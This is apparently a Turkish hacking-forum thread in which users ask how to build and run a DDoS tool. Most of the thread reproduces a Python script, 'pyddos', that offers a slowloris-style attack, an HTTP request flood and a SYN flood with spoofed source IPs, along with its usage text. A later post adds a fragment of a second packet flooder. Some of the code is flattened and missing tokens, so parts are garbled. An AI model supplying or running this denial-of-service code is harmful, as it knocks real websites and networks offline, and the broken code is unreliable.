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nasıl yaptın la
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nasıl yaptın la
bunun için hangi kütüphaneler lazımPython:#!/usr/bin/env python3 version= '3.0 ''' import re import os import sys import json import time import string import signal import http.client,urllib.parse from random import * from socket import * from struct import * from threading import * from argparse import ArgumentParser,RawTextHelpFormatter if == 'posix': c = os.system('which pip') if c == 256: os.system('sudo apt-get install python-pip') else: pass else: print ('[-] Check your pip installer') try: import requests,colorama from termcolor import colored,cprint except: try: if == 'posix': os.system('sudo pip install colorama termcolor requests') sys.exit('[+] I have installed necessary modules for you') elif == 'nt': os.system('pip install colorama requests termcolor') sys.exit('[+] I have installed nessecary modules for you') else: sys.exit('[-] Download and install necessary modules') except Exception as e: print ('[-]',e) if == 'nt': colorama.init() signal.signal(signal.SIGFPE,signal.SIG_DFL) def fake_ip(): while True: ips = [str(randrange(0,256)) for i in range(4)] if ips[0] == "127": continue fkip = '.'.join(ips) break return fkip def check_tgt(args): tgt = args.d try: ip = gethostbyname(tgt) except: sys.exit(cprint('[-] Can\'t resolve host:Unknown host!','red')) return ip def add_useragent(): try: with open("./ua.txt","r") as fp: uagents = re.findall(r"(.+)\n", except FileNotFoundError: cprint('[-] No file named \'ua.txt\',failed to load User-Agents','yellow') return [] return uagents def add_bots(): bots=[] bots.append('') bots.append('') return bots class Pyslow: def __init__(self, tgt, port, to, threads, sleep): self.tgt = tgt self.port = port = to self.threads = threads self.sleep = sleep self.method = ['GET','POST'] self.pkt_count = 0 def mypkt(self): text = choice(self.method) + ' /' + str(randint(1,999999999)) + ' HTTP/1.1\r\n'+\ 'Host:'+self.tgt+'\r\n'+\ 'User-Agent:'+choice(add_useragent())+'\r\n'+\ 'Content-Length: 42\r\n' pkt = buffer(text) return pkt def building_socket(self): try: sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP) sock.settimeout( sock.connect((self.tgt,int(self.port))) self.pkt_count += 3 if sock: sock.sendto(self.mypkt(),(self.tgt,int(self.port))) self.pkt_count += 1 except Exception: sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP) sock.settimeout( sock.connect((self.tgt,int(self.port))) sock.settimeout(None) self.pkt_count+=3 if sock: sock.sendto(self.mypkt(),(self.tgt,int(self.port))) self.pkt_count+=1 except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) return sock def sending_packets(self): try: sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP) sock.settimeout( sock.connect((self.tgt,int(self.port))) self.pkt_count+=3 if sock: sock.sendall('X-a: b\r\n') self.pkt+=1 except Exception: sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP) sock.settimeout( sock.connect((self.tgt,int(self.port))) sock.settimeout(None) if sock: sock.sendall('X-a: b\r\n') self.pkt_count+=1 except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) return sock def doconnection(self): socks = 0 fail=0 lsocks=[] lhandlers=[] cprint('\t\tBuilding sockets','blue') while socks < (int(self.threads)): try: sock = self.building_socket() if sock: lsocks.append(sock) socks+=1 if socks > int(self.threads): break except Exception: fail+=1 except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) cprint('\t\tSending packets','blue') while socks < int(self.threads): try: handler = self.sending_packets() if handler: lhandlers.append(handler) socks+=1 if socks > int(self.threads): break else: pass except Exception: fail+=1 except KeyboardInterrupt: break sys.exit(cprint('[-] Canceled by user','red')) # print colored('I have sent ','green') + colored(str(self.pkt_count),'cyan') + colored(' packets successfully.Now i\'m going to sleep for ','green') + colored(self.sleep,'red') + colored(' second','green') time.sleep(self.sleep) class Requester(Thread): def __init__(self,tgt): Thread.__init__(self) self.tgt = tgt self.port = None self.ssl = False self.req = [] self.lock=Lock() url_type = urllib.parse.urlparse(self.tgt) if url_type.scheme == 'https': self.ssl = True if self.ssl == True: self.port = 443 else: self.port = 80 def header(self): cachetype = ['no-cache','no-store','max-age='+str(randint(0,10)),'max-stale='+str(randint(0,100)),'min-fresh='+str(randint(0,10)),'notransform','only-if-cache'] acceptEc = ['compress,gzip','','*','compress;q=0,5, gzip;q=1.0','gzip;q=1.0, indentity; q=0.5, *;q=0'] acceptC = ['ISO-8859-1','utf-8','Windows-1251','ISO-8859-2','ISO-8859-15'] bot = add_bots() c=choice(cachetype) a=choice(acceptEc) http_header = { 'User-Agent' : choice(add_useragent()), 'Cache-Control' : c, 'Accept-Encoding' : a, 'Keep-Alive' : '42', 'Host' : self.tgt, 'Referer' : choice(bot) } return http_header def rand_str(self): mystr=[] for x in range(3): chars = tuple(string.ascii_letters+string.digits) text = (choice(chars) for _ in range(randint(7,14))) text = ''.join(text) mystr.append(text) return '&'.join(mystr) def create_url(self): return self.tgt + '?' + self.rand_str() def data(self): url = self.create_url() http_header = self.header() return (url,http_header) def run(self): try: if self.ssl: conn = http.client.HTTPSConnection(self.tgt,self.port) else: conn = http.client.HTTPConnection(self.tgt,self.port) self.req.append(conn) for reqter in self.req: (url,http_header) = method = choice(['get','post']) reqter.request(method.upper(),url,None,http_header) except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) except Exception as e: print (e) finally: self.closeConnections() def closeConnections(self): for conn in self.req: try: conn.close() except: pass class Synflood(Thread): def __init__(self,tgt,ip,sock=None): Thread.__init__(self) self.tgt = tgt self.ip = ip self.psh = '' if sock is None: self.sock = socket(AF_INET,SOCK_RAW,IPPROTO_TCP) self.sock.setsockopt(IPPROTO_IP,IP_HDRINCL,1) else: self.sock=sock self.lock=Lock() def checksum(self): s = 0 for i in range(0,len(self.psh),2): w = (ord(self.psh[i]) << 8) + (ord(self.psh[i+1])) s = s+w s = (s>>16) + (s & 0xffff) s = ~s & 0xffff return s def Building_packet(self): ihl=5 version=4 tos=0 tot=40 id=54321 frag_off=0 ttl=64 protocol=IPPROTO_TCP check=10 s_addr=inet_aton(self.ip) d_addr=inet_aton(self.tgt) ihl_version = (version << 4) + ihl ip_header = pack('!BBHHHBBH4s4s',ihl_version,tos,tot,id,frag_off,ttl,protocol,check,s_addr,d_addr) source = 54321 dest = 80 seq = 0 ack_seq = 0 doff = 5 fin = 0 syn = 1 rst = 0 ack = 0 psh = 0 urg = 0 window = htons(5840) check = 0 urg_prt = 0 offset_res = (doff << 4) tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5) tcp_header=pack('!HHLLBBHHH',source,dest,seq,ack_seq,offset_res,tcp_flags,window,check,urg_prt) src_addr = inet_aton(self.ip) dst_addr = inet_aton(self.tgt) place = 0 protocol = IPPROTO_TCP tcp_length = len(tcp_header) self.psh = pack('!4s4sBBH',src_addr,dst_addr,place,protocol,tcp_length); self.psh = self.psh + tcp_header; tcp_checksum = self.checksum() tcp_header = pack('!HHLLBBHHH',source,dest,seq,ack_seq,offset_res,tcp_flags,window,tcp_checksum,urg_prt) packet = ip_header + tcp_header return packet def run(self): packet=self.Building_packet() try: self.lock.acquire() self.sock.sendto(packet,(self.tgt,0)) except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) except Exception as e: cprint(e,'red') finally: self.lock.release() def main(): parser = ArgumentParser( usage='./%(prog)s -t [target] -p [port] -t [number threads]', formatter_class=RawTextHelpFormatter, prog='pyddos', description=cprint(title,'white',attrs=['bold']), epilog=''' Example: ./%(prog)s -d -p 80 -T 2000 -Pyslow ./%(prog)s -d -s 100 -Request ./%(prog)s -d -Synflood -T 5000 -t 10.0 ''' ) options = parser.add_argument_group('options','') options.add_argument('-d',metavar='<ip|domain>',default=False,help='Specify your target such an ip or domain name') options.add_argument('-t',metavar='<float>',default=5.0,help='Set timeout for socket') options.add_argument('-T',metavar='<int>',default=1000,help='Set threads number for connection (default = 1000)') options.add_argument('-p',metavar='<int>',default=80,help='Specify port target (default = 80)' + colored(' |Only required with pyslow attack|','red')) options.add_argument('-s',metavar='<int>',default=100,help='Set sleep time for reconnection') options.add_argument('-i',metavar='<ip address>',default=False,help='Specify spoofed ip unless use fake ip') options.add_argument('-Request',action='store_true',help='Enable request target') options.add_argument('-Synflood',action='store_true',help='Enable synflood attack') options.add_argument('-Pyslow',action='store_true',help='Enable pyslow attack') options.add_argument('--fakeip',action='store_true',default=False,help='Option to create fake ip if not specify spoofed ip') args = parser.parse_args() if args.d == False: parser.print_help() sys.exit() add_bots();add_useragent() if args.d: check_tgt(args) if args.Synflood: uid = os.getpid() if uid == 0: cprint('[*] You have enough permisson to run this script','green') time.sleep(0.5) else: sys.exit(cprint('[-] You haven\'t enough permission to run this script','red')) tgt=check_tgt(args) synsock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP) synsock.setsockopt(IPPROTO_IP,IP_HDRINCL,1) ts=[] threads=[] print (colored('[*] Started SYN Flood: ','blue')+colored(tgt,'red')) while 1: if args.i == False: args.fakeip = True if args.fakeip == True: ip = fake_ip() else: ip = args.i try: for x in range(0,int(args.T)): thread=Synflood(tgt,ip,sock=synsock) thread.setDaemon(True) thread.start() thread.join() except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) elif args.Request: tgt = args.d threads = [] print (colored('[*] Start send request to: ','blue')+colored(tgt,'red')) while 1: try: for x in range(int(args.T)): t=Requester(tgt) t.daemon = True t.start() t.join() except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) elif args.Pyslow: try: tgt = args.d port = args.p to = float(args.t) st = int(args.s) threads = int(args.T) except Exception as e: print ('[-]',e) while 1: try: worker=Pyslow(tgt,port,to,threads,st) worker.doconnection() except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) if not (args.Synflood) and not (args.Request) and not (args.Pyslow): parser.print_help() print sys.exit(cprint('[-] You must choose attack type','red')) if __name__ == '__main__': main()
bunun için hangi kütüphaneler lazım
_ \ __ \ __ \ ___| _) |
| | | | | | | | _ \ __| \___ \ __| __| | __ \ __|
___/ | | | | | | ( |\__ \ | ( | | | | |
_| \__, |____/ ____/ \___/ ____/ _____/ \___|_| _| .__/ \__|
____/ _|
DDos python script | Script used for testing ddos | Ddos attack
Author: ___T7hM1___
usage: python3 -d [target] -p [port] -T [number threads]
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-d <ip|domain> Specify your target such an ip or domain name
-t <float> Set timeout for socket
-T <int> Set threads number for connection (default = 1000)
-p <int> Specify port target (default = 80) |Only required with pyslow attack|
-s <int> Set sleep time for reconnection
-i <ip address> Specify spoofed ip unless use fake ip
-Request Enable request target
-Synflood Enable synflood attack
-Pyslow Enable pyslow attack
--fakeip Option to create fake ip if not specify spoofed ip
python3 -d -p 80 -T 2000 -Pyslow
python3 -d -s 100 -Request
python3 -d -Synflood -T 5000 -t 10.0
bunu buldlememiz falan mı lazım nasıl kullanılıyorNote
- I wrote this script for educational not for destructive purposes and illegal actions, so I won't be responsible for that
Requires module
- termcolor
- colorama
Python:_ \ __ \ __ \ ___| _) | | | | | | | | | _ \ __| \___ \ __| __| | __ \ __| ___/ | | | | | | ( |\__ \ | ( | | | | | _| \__, |____/ ____/ \___/ ____/ _____/ \___|_| _| .__/ \__| ____/ _| DDos python script | Script used for testing ddos | Ddos attack Author: ___T7hM1___ Github: Version:3.0 usage: python3 -d [target] -p [port] -T [number threads] optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit options: -d <ip|domain> Specify your target such an ip or domain name -t <float> Set timeout for socket -T <int> Set threads number for connection (default = 1000) -p <int> Specify port target (default = 80) |Only required with pyslow attack| -s <int> Set sleep time for reconnection -i <ip address> Specify spoofed ip unless use fake ip -Request Enable request target -Synflood Enable synflood attack -Pyslow Enable pyslow attack --fakeip Option to create fake ip if not specify spoofed ip Example: python3 -d -p 80 -T 2000 -Pyslow python3 -d -s 100 -Request python3 -d -Synflood -T 5000 -t 10.0
Python inidirip kullanabilirsinbunu buldlememiz falan mı lazım nasıl kullanılıyor
Gpt gibime geldi.İleri seviye bir kod değildir ama işe yarar diye düşünüyorum. Dosya vs. vermiyeceğim için vt eklemedim iyi kullanımlar.
from lib2to3.fixes import fix_input
import socket
import random
import os
hedef_ip=fix_input("hedef ip: ")
hedef_port=input("hedef port: ")
while True:
print("saldiri baslatildi,gonderilen paket:%s"%(sayac))
olm bunu nasil yaptin
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